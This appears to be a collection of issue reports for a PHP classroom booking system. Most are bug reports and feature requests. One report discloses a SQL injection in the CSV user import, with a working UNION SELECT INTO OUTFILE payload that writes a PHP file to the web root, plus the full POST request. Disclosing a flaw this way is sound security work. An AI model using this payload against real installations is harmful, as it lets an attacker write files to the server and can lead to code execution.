Thanks for such a great system! After updating to 2.6.3 we're having a minor issue when creating bookings, after entering the details in the create booking dialog box and clicking create booking the screen clears and we're just left with the background. Manually refreshing the webpage brings the screen back with the booking completed. This occurs for other users and whether it's a single booking or recurring. It's not a gamestopper though :-)

Creating the booking:

Blank screen

Thanks

I am using Hubot and its post request doesn't work because it for some reason doesn't send the data correctly (i think).

My another problem though is that when I do that post request on index.php/login/submit which is basically a login form action it doesn't open a session on the server side when I do it with curl. I copied the request from dev tools which is used and it works only if I already have an open session in the browser.

if I have an open session on the server already, it redirects me correctly to the logged in window, otherwise it just redirects me back to the login page.. (renders the login view as content)

When clicking on the Settings or Authentication buttons it delivers a white screen with the message below.

404 Page Not Found The page you requested was not found.

URL: http://roombooking.domainname.co.uk/index.php/settings/authentication/ldap http://roombooking.domainname.co.uk/index.php/settings/general

Hello.

I saw the LDAP authentication and was wondering what would be the template for adding a new type of authentication. I want to load the app as an iframe inside an existing one (I would prefer to integrate it better, but codeIgniter apps don't really lend themselves to this) and I would really like to reuse existing authentication.

To me this means on one side adding to index.php my authentication check (so it can't be loaded without the parent frame's authentication) and on another to call the user details and logged in status from my own.

I have been taking a loot at it but I can't figure out the current order of events that I would need to catch or how to create a new type of authentication that doesn't rely on a local user table at all (my user table is in a different database, and all information relevant to the user lives in the cookie).

Any help or guidance? What are the least intrusive modifications I could do to take over user authentication check and user tokens and ID.

iCal for rooms and users' bookings. Might be useful for people wanting to have their bookings showing in their own Outlook/Email calendar.

/ical/room/ict1 - all entries in this room. /ical/room/ict1/timetable - timetable bookings /ical/room/ict1/single - single bookings

/ical/user/jsmith - all bookings for this user /ical/user/jsmith/timetable - timetable bookings /ical/user/jsmith/single - single bookings

Hi Craig

Thank you once again for creating such an incredibly useful system. Thank you for your hard work on this new version. Added features look great.

I was testing a couple of things and it has come to my attention that "Enable Multiple Selection" when checked by a "Teacher", it says bookings were created but the cells are not blocked. Tried to book multiple slots.

It says three bookings were created but it doesn't block those slots.

It does show 3 bookings on the dashboard as well

Users

Am I missing something here?

Hi and thanks for your useful project. I'm testing develop release 2.6.2 and i noticed that i cannot make a recursive booking on multiple selections.

1. I pick "Enable multiple selection".
2. In the dialog i select "Recurring bookings every week ..."
3. No matter which option i select in the date range "Starting From..." <-> "Until" but clicking "next" doesn't have effect.

I attach screenshots. Thanks.

As a school we are only open Monday to Friday - could we have the ability to hide Saturday/Sunday?

Teachers sometimes get confused when they click 'next day' and get told there are 'no periods configured' etc.

After running through the process of making a recurring booking, after hitting the 'create bookings' button, I have to refresh the blank page in order to return to the booking calendar, is this being seen on other installs?

After the administrator logs in, when adding a new user, choose to import the csv file, and there is SQL injection in the csv file username.

The csv file is as follows: test'/**/union/**/select/**/'<?php phpinfo(); ?>'/**/into/**/outfile/**/'C:\\phpstudy_pro\\WWW\\hcms\\info.php'#, test, test, [email protected], test1234

If mysql has writable permissions，this csv file will create a new phpinfo file in the website directory.

the POST file is:

POST /hcms/index.php/users/import HTTP/1.1
Host: 192.168.31.120
Content-Length: 825
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.31.120
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzClKDALsrTEKS6TB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.31.120/hcms/index.php/users/import
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: crbs=tr55skb4jdshkp7vcpb7q4i0pbd2te46
Connection: close

------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="action"

import
------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="userfile"; filename="1.csv"
Content-Type: application/vnd.ms-excel

test'/**/union/**/select/**/'<?php phpinfo(); ?>'/**/into/**/outfile/**/'C:\\phpstudy_pro\\WWW\\hcms\\info.php'#, test, test, [email protected], test1234
------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="authlevel"

2
------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="enabled"

0
------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="enabled"

1
------WebKitFormBoundaryzClKDALsrTEKS6TB--

Hey Craig,

First of all: thank you for making this great tool. In addition to being a classroom booking tool, it is also great for managing available spaces during the COVID epidemic.

A small note from my side: Even in a very narrow browser window, The Workspace view button remains at 50% screen width and allows ample space for Names and notes, however by default a 15 character limit is hardcoded into bookings_model.php: $cell['body'] .= '<span title="'.$notes.'">'.character_limiter($notes, 15).'</span>';

This limit seems rather low for the amount of horizontal space that is available in the 'room' field and that's without considering the ample vertical space for adding a second line of text. For our use case I simply increased the manual limit in bookings_model.php but am aware that this will need to be corrected after any future update to the code.

I think it would be helpful to expose the character limit value in the application settings, or at least increase the hardcoded limit as it currently seems unnecessarily low.

Thanks again for a great tool!

running ubuntu server 22.04 in vm, installed all the required packages as instructed in documentation. but somehow the index.php wont run unless the web server is apache. is this an issue of CRBS or my Nginx config?

the vm is running below: Ubuntu Server 22.04 Nginx 1.23.2 PHP7.3 MariaDB 10.6.11

and i am trying to install CRBS ver2.6.4

Hi, I ran into another problem. Conflict checking is done on a periodic basis only. If a period is entered in hours that contain each other, it does not see it as a conflict. It allows me to choose the same instructor and room for periods starting at 09:30 and 10:00.

Preview button is not working. If I select "end of session" in the "Until..." section, it works, if I choose something else, the button becomes useless. Is it just me having this problem?

XAMPP installed on Windows Thank you

Using a password manager I had issues when copy pasting a password which exceeded the maxlength of 20 of the password field. That's why I made this pull request which increases the length of the field to 50 chars.

Since we have the option to record an email address when creating accounts it would be a nice feature to be able to configure email client settings so that you have the ability to email out bookings and cancellations when made by users of the system.

Hi! Me and my partner test your project for a subject of security in college and found a couple of vulnerabilities in the booking process and in the user profile editing, so we decided to make some corrections.

We hope you find this helpful. Greetings from Argentina!